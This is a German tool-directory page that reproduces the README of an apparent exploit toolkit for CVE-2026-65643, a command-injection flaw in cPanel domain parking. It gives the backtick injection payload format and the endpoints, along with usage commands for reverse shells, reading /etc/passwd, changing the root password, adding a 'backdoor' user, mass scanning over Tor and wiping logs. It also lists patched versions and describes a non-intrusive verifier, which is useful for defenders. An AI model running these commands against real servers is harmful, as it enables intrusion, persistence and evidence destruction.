Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-65643-PoC-Toolkit — Red/Blue-Team-Toolkit für CVE-2026-65643, eine RCE-Lücke im cPanel-Domain-Parking. Enthält Exploit mit Reverse Shell, Webshell, Persistenz und Massen-Scanning sowie einen nicht-intrusiven Verifizierer für Erkennung und Auditing. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Privilege EscalationSchwachstellenscannerPersistenzmechanismenExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Payload-Entwicklung
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Red/Blue-Team-Toolkit für CVE-2026-65643, eine RCE-Lücke im cPanel-Domain-Parking. Enthält Exploit mit Reverse Shell, Webshell, Persistenz und Massen-Scanning sowie einen nicht-intrusiven Verifizierer für Erkennung und Auditing.

Repository anzeigen
vor 1 TagNoch nicht geprüft

CVEPoC

CVE‑2026‑65643 – cPanel Domain Parking RCE Toolkit

Python 3.8+ CVSS Author cPanel

⚠️ NUR FÜR ETHISCHEN EINSATZ – AUTORISIERTE SICHERHEITSTESTS Dieses Repository stellt Werkzeuge ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit. Unautorisierter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.


📖 Überblick über die Schwachstelle

CVE‑2026‑65643 ist eine kritische Command-Injection-Schwachstelle in cPanel & WHM Version 11.x, die es einem authentifizierten cPanel-Benutzer ermöglicht, beliebige Systembefehle mit Root-Rechten über die Domain-Parking-Funktionalität auszuführen.

So funktioniert es

  1. Authentifizierter Zugriff erforderlich – der Angreifer muss über ein gültiges cPanel-Konto (Benutzername/Passwort) auf dem Zielserver verfügen.
  2. Domain-Parking-Injection – beim Hinzufügen einer geparkten Domain wird der Domainname nicht ordnungsgemäß bereinigt, sodass der Angreifer Shell-Befehle mit Backticks (`) injizieren kann.
  3. Befehlsausführung – der injizierte Befehl wird vom System mit den Rechten des cPanel-Benutzers ausgeführt, die über Privilege-Escalation-Techniken auf Root erweitert werden können.
  4. Root-Rechte – da die Domain-Parking-Operation mit ausreichenden Berechtigungen ausgeführt wird, können beliebige Befehle mit hohen Rechten ausgeführt werden.
  5. Auswirkungen – vollständige Serverkompromittierung, Datendiebstahl, Backdoors, Ransomware und laterale Bewegung. Sofort aktualisieren!

Betroffene Versionen

  • cPanel & WHM 11.110.0.140 und früher – verwundbar
  • 11.134.0.52 und früher – verwundbar
  • 11.136.0.36 und früher – verwundbar
  • 11.138.0.1 und früher – verwundbar
  • 11.138.1.6 und später – gepatcht

Patch

  • Aktualisieren Sie auf cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 oder 11.110.0.141 oder neuer.
  • Falls ein Upgrade nicht möglich ist, deaktivieren Sie die Domain-Parking-Berechtigungen für cPanel-Benutzer als temporären Workaround.

🧰 Werkzeuge

WerkzeugZweckZielgruppe
exploit.pyVollständig ausgestattetes Toolkit mit Reverse Shell, WebShell, Persistenz, Datei lesen/schreiben, Root-Passwort-Änderung, Massenscanning, Tor-Unterstützung und OPSEC-Funktionen.

📊 Funktionsvergleich


🎯 Anwendungsfall-Zusammenfassung


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Parameter

exploit.py Parameter

verifier.py Parameter


💥 Szenarien


🧪 Endpunkt- und Injektionsmethoden

Der Exploit verwendet die folgenden cPanel-Endpunkte und Injektionsmethoden:

Payload-Format

root@kitploit:~
# Injektions-Payload-Format
test.com`<befehl>`

# Beispiel
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Verantwortungsvolle Nutzung

  • Verwenden Sie diese Werkzeuge nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unautorisierter Zugriff ist illegal und unethisch.
  • Die Autoren sind nicht für Missbrauch verantwortlich.
  • Befolgen Sie stets die Gesetze und Vorschriften Ihres Landes.

Diese Software wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Tool herunterladen
Red Teams / autorisierte Pentester
verifier.pyNicht-intrusiver Schwachstellenprüfer, der die cPanel-Version erkennt, die Injection validiert und das Risiko bewertet, ohne bösartige Payloads auszuführen. Erstellt detaillierte Berichte.Blue Teams / Sicherheitsauditoren
Funktionexploit.pyverifier.py
Schwachstellenerkennung✅✅
Versionserkennung (4 Endpunkte)✅✅
Command Injection✅❌
Reverse Shell✅❌
WebShell-Upload✅❌
Persistenz (cPanel-Benutzererstellung)✅❌
Root-Passwort-Änderung✅❌
Datei lesen/schreiben✅❌
4 Injektionsmethoden (JSON/Form/CGI/API2)✅✅
Tor-Unterstützung (Anonymität)✅❌
User-Agent-Rotation (OPSEC)✅❌
Jitter (OPSEC)✅❌
Massenscanning (Multi-Thread)✅❌
Interaktive Shell✅❌
Nicht-intrusiver (sicherer) Modus❌✅
Zeitstempel-Protokollierung✅✅
HTML-Bericht✅❌
JSON-Bericht✅✅
Log-Bereinigung (Anti-Forensik)✅✅
Proxy-Unterstützung✅✅
Benutzerdefinierter User-Agent✅✅
SSL-Verifizierungssteuerung✅✅
SzenarioEmpfohlenes Werkzeug
Blue Team – Überprüfung, ob Ihre cPanel-Installation verwundbar istverifier.py
Sicherheitsaudit – nicht-intrusive Schwachstellenbewertungverifier.py
Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzungexploit.py
Bug Bounty – verantwortungsvolle Offenlegungstestsverifier.py
Massenscanning – Überprüfung mehrerer Ziele auf Schwachstellenexploit.py (nur Erkennung)
Incident Response – Überprüfung, ob Systeme kompromittiert sindverifier.py
ParameterBeschreibung
-t, --targetZiel-cPanel-URL (z. B. https://cpanel.example.com:2083)
-l, --target-fileDatei mit Liste der Ziele (eine pro Zeile) für Massenscanning
-u, --usernamecPanel-Benutzername
-P, --passwordcPanel-Passwort
-p, --portcPanel-Port überschreiben (Standard aus URL oder 2083)
--threadsAnzahl der Threads für mehrere Ziele (Standard: 10)
-o, --outputJSON-Bericht in Datei speichern
--html-reportHTML-Bericht in Datei speichern
-v, --verboseAusführliche Ausgabe
--proxyHTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080)
--torÜber Tor leiten (localhost:9050)
-ua, --user-agentBenutzerdefinierter User-Agent
--no-keep-aliveSession nicht am Leben halten
--delayVerzögerung zwischen Anfragen (Standard: 2,0 s)
--jitterZufälliger Jitter (0–1 s) zwischen Anfragen (Standard: 0,5)
--max-retriesMaximale Wiederholungsversuche (Standard: 5)
--ssl-verifySSL-Zertifikate verifizieren
--timeoutAnfrage-Timeout (Standard: 15 s)
--cmdEinzelnen Befehl auf dem Ziel ausführen
--reverse-shellReverse-Shell-IP:PORT
--passwdRoot-Passwort ändern
--addusercPanel-Benutzer erstellen (BENUTZER DOMAIN PASSWORT)
--readDatei lesen
--writeDatei schreiben (Pfad angeben)
--write-contentInhalt zum Schreiben
--cleanupLogs und Verlauf nach der Ausnutzung bereinigen
-i, --interactiveInteraktive Shell nach der Ausnutzung
--domain-suffixSuffix für geparkte Domain (Standard: exploit.local)
ParameterBeschreibung
-t, --targetZiel-cPanel-URL (z. B. https://cpanel.example.com:2083)
-u, --usernamecPanel-Benutzername
-P, --passwordcPanel-Passwort
-o, --outputJSON-Bericht in Datei speichern
-v, --verboseAusführliche Ausgabe
--proxyHTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080)
--torÜber Tor leiten (localhost:9050)
--ssl-verifySSL-Zertifikate verifizieren
--timeoutAnfrage-Timeout (Standard: 15 s)
--cleanupLogs nach dem Test bereinigen
#SzenarioBefehl
1Schnelle Schwachstellenprüfungpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Detaillierter Scan mit Berichtpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Reverse Shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Befehl ausführenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Sensible Datei lesenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Root-Passwort ändernpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Neuen cPanel-Benutzer erstellen (Persistenz)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Interaktive Shell nach der Ausnutzungpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Massenscanning aus Dateipython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Proxy, Tor und benutzerdefinierten User-Agent verwendenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Logs nach der Ausnutzung bereinigenpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
MethodeEndpunktBeschreibung
JSON-API/cpsessXXXXX/json-api/domainPrimäre Injektionsmethode über JSON-Payload
Formulardaten/cpsessXXXXX/json-api/domainAlternative Injektion über formularcodierte Daten
CGI-Skript/cgi-sys/domainpark.cgiLegacy-CGI-Endpunkt-Injektion
API2/cpsessXXXXX/json-api/cpanelLegacy-API2-Injektionsmethode